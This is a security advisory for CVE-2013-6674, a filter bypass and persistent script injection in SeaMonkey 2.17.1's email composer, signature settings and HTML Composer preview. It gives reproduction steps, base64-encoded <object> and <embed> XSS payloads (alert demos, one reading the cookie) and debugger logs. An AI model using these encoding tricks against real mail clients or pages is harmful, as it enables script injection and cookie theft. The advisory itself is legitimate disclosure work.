Mozilla SeaMonkey - Filter Bypass & Persistent Vulnerability

Document Title:
===============
Mozilla SeaMonkey - Filter Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=967
Mozilla Bug Tracking ID: 881686

http://www.vulnerability-lab.com/get_content.php?id=953
Mozilla Bug Tracking ID: 875818

Exclusive News: (Partners)  http://news.softpedia.com/news/Critical-Validation-and-Filter-Bypass-Vulnerability-Fixed-in-Thunderbird-420962.shtml

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6674

CVE-ID:
=======
CVE-2013-6674


Release Date:
=============
2014-01-29


Vulnerability Laboratory ID (VL-ID):
====================================
967


Common Vulnerability Scoring System:
====================================
7.3


Product & Service Introduction:
===============================
SeaMonkey is a free and open source cross-platform Internet suite. It is the continuation of the former Mozilla Application Suite, 
based on the same source code. The development of SeaMonkey is community-driven, in contrast to the Mozilla Application Suite, which 
until its last released version (1.7.13) was governed by the Mozilla Foundation. The new project-leading group is the SeaMonkey Council.

SeaMonkey consists of a web browser (SeaMonkey Navigator), which is a descendant of the Netscape family, an e-mail and news client 
program (SeaMonkey Mail & Newsgroups, which shares code with Mozilla Thunderbird), an HTML editor (SeaMonkey Composer) and an IRC 
client (ChatZilla). The software suite supports skins. It comes with two skins in the default installation, Modern and Classic.

Mail
Mail features includes support for multiple accounts {the documentation does not state how many}, junk mail detection, message filters, 
HTML message support, a dictionary, an address book, customizable labels, add-ons and mail views as well as integration with the rest of suite.

Composer
SeaMonkey Composer 2.16 running on Ubuntu 12.04. SeaMonkey Composer is a WYSIWYG HTML editor. Its main user interface features four tabs: 
Normal (WYSIWYG), HTML tags, HTML code, and browser preview. The generated code is HTML 4.01 Transitional. As of version 1.1.13, 
SeaMonkey Composer supports basic text formatting and styling, insertion of hyperlinks and images, and the creation of tables. It does 
not support the addition of form elements (text fields, check boxes, and buttons). SeaMonkey Composer is scheduled to be updated with the 
release of KompoZer 0.8 which is currently under development.


Vendor Homepage: 	http://www.mozilla.org
Product website: 	http://www.seamonkey-project.org/releases/seamonkey2.17/


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass and persistent validation web vulnerability in the Mozilla Seamonkey application.


Vulnerability Disclosure Timeline:
==================================
2013-05-10: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-05-11: Vendor Notification (Mozilla Security Incident Team)
2013-05-21: Vendor Response/Feedback (Mozilla Security Incident Team)
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
2014-01-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Mozilla
Product: Seamonkey 2.17.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Since Seamonkey is using Mozilla Thunderbird at the backend for its mail client, It is prone to the same Persistent vulnerability 
that i had reported earlier to Mozilla Security Team. 

I will include the details again in this advisory for your reference and ease. 

Basically , attaching a debugger with the seamonkey binary file, it was initially noticed that malicious java-script tags were being 
filtered / blocked. By default, HTML tags like <script> and <iframe> are blocked in Seamonkey and get filtered immediately upon 
insertion however, While drafting a new email message, attackers can easily bypass the current input filters by encoding their 
payloads with base64 encryption and using the <object> tag and insert malicious scripts / code eg. (script / frame) within the 
emails and send it to the victims. The exploit gets triggered once the victim decides to reply back and clicks on the `Reply` or `Forward` Buttons.

After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send 
it to victims. Interestingly the payload gets filtered during the initial viewing mode however if the victim clicks on Reply or 
Forward, the exploit gets executed successfully. For a POC i will be including multiple examples in this advisory for your review. 
I was able to run multiple scripts generating strange behaviour on the application which can be seen in the debugging errors 
which I have attached along with this report.

These sort of vulnerabilities can result in multiple attack vectors on the client end which may eventually result in complete 
compromise of the end user system. The persistent code injection vulnerability is located within the main application. Exploitation 
of this persistent application vulnerability requires a low or medium user interaction. Successful exploitation of the vulnerability 
may result in malicious script code being executed in the victims browser resulting in script code injection, persistent phishing, 
Client side redirects and similar client side attacks.


Vulnerable Service(s):
[+] Seamonkey 2.17.1 - Latest Release 


Vulnerable Section(s):
[+] Compose (Compose in HTML)
[+] Email Signature (Mail & Newsgroups Account Settings)
[+] Attach File with Signature as HTML (Mail & Newsgroups Account Settings)


Proof of Concept (PoC):
=======================
The validation and filter bypass vulnerability can be exploited by remote attackers without privileged application user account 
and direct user interaction. To demonstrate or reproduce the vulnerability follow the provided steps and information below.

Proof of Concept #1

a) Create a new email message (Compose in HTML)
b) In the body text, insert new HTML tag with the POC "Payload"
c) Send the email to the victim (your test email account)
d) Open the new email in the victim browser and click Reply
e) You should now see a Javascript Application popup window proving the existence of this vulnerability.


Proof of Concept #2

a) Goto Edit and then Mail & Newsgroups Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and Click on "Compose" (compose in HTML) to create a new email
d) You should get a popup the moment new Email editor window opens up proving the existence of this vulnerability.


Proof of Concept #3

a) Create a new text file on your desktop (local computer), insert the POC payload and save it as test.html (HTML)
b) Goto Edit and then Mail & Newsgroups Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'  
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on "Compose" (Compose in HTML) and you should be able to see the Javascript popup proving the existence of this vulnerability.


Payload #1

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg=="></object>


Payload #2

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


1.3 
POC Technical Description:

Here, we used the data URI payload as a value assigned to the ‘data’ attribute of the ‘object’ tag. The <object> tag is used to include objects
such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The ‘data’ attribute of the object tag defines a URL that refers to the
object’s data. Data in the "data:" URI is encoded as a base64 string:

Base64-encoded payload: PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==

Base64-decoded payload: <script>alert("Vulnerable");</script>

When the browser loads the object tag, it loads an object (in our case, it’s a javascript) assigned to its data attribute. This causes execution 
of our javascript. We were able to bypass the application blacklist filter because of the base64-encoded payload. 





2.0
Seamonkey HTML Composer Preview - Input Filter Bypass Vulnerability


Details:
By default, html tags like <script> alert/prompt are being filtered in the Composer preview feature however, using the <object> and 
or <embed> tags and base64 encoded payloads it is possible to bypass the current filters and execute script code. Even though I 
noticed that once you save it as an .html file, all normal payloads like <script>alert(1)</script> work. Its an HTML composer, 
maybe its not allowed to filter any dangerous / malicious code requests by default and I am definitely not challenging that fact 
at all. I just felt its important to highlight the fact that if all other tags are being blocked in the preview, then this one 
actually bypasses the current Seamonkey Composer preview filters and still works. 


Vulnerable Product(s):
				[+] Seamonkey 2.17.1 - Latest Release 

Vulnerable Module(s):
				[+] Composer (CTRL+4)

Vulnerable Section(s):
				[+] HTML Source
   

2.1
        
Proof of Concept:

a) Open New Seamonkey Composer Window 
b) Goto <HTML> Source
c) Copy/Paste any one of the payloads mentioned under the "Payload" section, anywhere in the Code before </body> tag.

Example Code that i used for this POC:

<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
<title>testtesttest</title>
</head>
<body>
<br>
<h4> </h4>
<h2> <object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
</h2>
</body>
</html>

d) Click on Preview and you should be able to see a Javascript proving the existence of this Filter Bypass Vulnerability


Payload #1
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>


Payload #2
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB
2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj
48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3Njcml
wdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


2.3

Interesting Raw Application Logs captured during the entire process of testing:


[JavaScript Error: "ReferenceError: dOcUmeNt is not defined" {file: "data:text/html;base64,
PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 1}]
[JavaScript Error: "TypeError: 
this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: t
his.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: 
"The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,
PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning: 
"The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different 
if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different 
if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
ModLoad: 6fcd0000 6fce2000   C:\Windows\SysWOW64\dhcpcsvc.DLL
ModLoad: 6fcc0000 6fccd000   C:\Windows\SysWOW64\dhcpcsvc6.DLL
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if 
viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: 
"TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: 
"Unknown property '-moz-border-radius-bottomleft'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3E
jakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=
t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topleft'.  Declaration dropped." {file: "https://www.google.com/search?q=
a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topright'.  Declaration dropped." {file: "https://www.google.com
/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-bottomright'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F
%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Error in parsing value for 'filter'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf
%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius'.  Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf
%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-box-shadow'.  Declaration dropped." 
{file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" 
line: 1}]
[JavaScript Warning: "Unknown pseudo-class or pseudo-element '-ms-clear'.  Ruleset ignored due to bad selector." 
{file: "https://www.google.com/search?q=
a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
ModLoad: 139d0000 13a21000   C:\Windows\SysWOW64\WINSPOOL.DRV
(1af0.258c): Unknown exception - code 000006ba (first chance)
[JavaScript Error: "NS_ERROR_NOT_INITIALIZED: Component returned failure code: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) [nsIEditor.selectionController]" 
{file: "chrome://navigator/content/urlbarBindings.xml" line: 107}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "WARN addons.updates: Update manifest for [email protected] did not contain an updates property" 
{file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
[JavaScript Warning: "WARN addons.updates: Update manifest for {972ce4c6-7e08-4474-a285-3208198ce6fd} did not contain an updates property" 
{file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the 
document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning: "The character encoding declaration of the HTML document was not found when prescanning the first 1024 bytes of the file. 
When viewed 
in a differently-configured browser, this page will reload automatically. The encoding declaration needs to be moved to be within the first 
1024 bytes of 
the file." {file: "file:///C:/Users/John%20Doe/Desktop/testtesttest.html" line: 5}]


Solution - Fix & Patch:
=======================
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)


Security Risk:
==============
The security risk of the persistent input validation and input filter bypass vulnerabilities are estimated as high(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan [[email protected]] [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2014 | Vulnerability Laboratory